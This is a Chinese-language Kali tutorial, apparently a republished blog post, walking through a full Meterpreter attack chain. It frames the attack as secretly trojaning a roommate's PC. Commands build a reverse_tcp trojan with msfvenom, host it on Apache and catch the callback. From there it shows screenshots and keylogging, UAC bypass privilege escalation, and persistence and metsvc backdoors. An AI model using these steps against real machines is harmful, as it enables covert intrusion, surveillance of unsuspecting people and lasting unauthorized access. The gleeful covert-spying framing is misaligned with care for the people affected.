kali滲透-基礎篇


滲透之meterpreter

模擬場景:小明是我室友,整天游戲人生,渾渾噩噩,前途迷茫,每次上課交作業都要看我的,於是我開啟了apche服務器,給他下載作業(別問我為什么不用QQ傳,因為要裝逼!),他無意中看到我的一些其他軟件,並也一起打包下載了,並且運行了一個*.exe程序,嘿嘿,從此他的電腦上便再無秘密可言。

 

0x1.實驗環境

  VMware

  kali(linux)系統 kali ip:192.168.127.128

  windows 7專業版

  kali鏡像官方下載地址->>https://www.kali.org/downloads/

0x2.開始實驗

  0x2.1.終端進入msfconsole控制台

  輸入->>msfconsole      回車即可

  

  生成木馬程序

  輸入->>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f exe > 1.exe

  提示:命令中的ip地址為kali IP地址,端口號可自行設定(盡量設置為不常用端口號),1.exe為木馬程序,名字隨意,由.exe結尾即可。

  

  開啟一個新終端

  

  開啟apache服務,將默認主頁刪除並復制1.exe文件到該目錄下

  輸入->>service apache2 start

    ->>rm /var/www/html/*

    ->>cp 1.exe /var/www/html/

  win7在同一局域網內主機就可以訪問到:http://192.168.127.128:80

  

  

  

  win7點擊1.exe文件即可下載,現在我們將該文件下載下來放到桌面上運行。

  回到kali的msf上,使用監聽模塊,設置一些參數,輸入options即可查看需要設置的參數。

  輸入->>use exploit/multi/handler

    ->>set payload windows/meterpreter/reverse_tcp

    ->>set LHost 192.168.127.128

    ->>set LPORT 4444

提示:IP為kali IP地址,端口為之前生成1.exe時端口,默認端口為4444

  

  執行exploit即可連上win7了

  

  查看當前權限

  輸入命令->>getuid

  

  顯示系統權限,那就可以做很多事情了。

  可能做到這里就只有用戶權限了,那也是沒關系的!

  可以先試試獲取遠端桌面截屏,記錄鍵盤等

  截屏操作

  輸入->>screenshot

  

  還有就是鍵盤記錄,你輸了什么我都知道,哈哈哈。

  

  如果不是system權限或administrator權限就需要提權。

  shell命令打開win7終端

  提權

  說明:本來我第一次做的時候拿到的也是用戶權限,找了一些資料,試了幾種方法均未成功,后來看到一篇win7提權的,終於成功了!

  以exploit/windows/local/bypassuac模塊為例

  該模塊在windows 32位和64位下都有效。

  msf > use exploit/windows/local/bypassuac      ->> set session 2      ->> exploit
  用sessions命令就可以看到自己的編號了,我這里是2
   
  植入后門 
    提升權限完第一件事就是留后門了。
    現在只不過是放了一個馬而已,下次啟動就不運行了,這怎么行!所以我們得留個后門啊!
    輸入->>run persistence -X -i 5 -p 4444 -r 192.168.127.128
  
  -X為開機自啟 -i為反向連接
  metsvc攻擊
    開啟一個會話服務
    輸入->>run metsvc
  
  win7上已經有了。
  

  

  

  

 

參考來自-》》https://xz.aliyun.com/t/2536#toc-2

    -》》https://paper.seebug.org/29/

提權文章使用的是->>https://www.cnblogs.com/wh4am1/p/6602650.html方法,可以嘗試其他方法進行提權哦!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM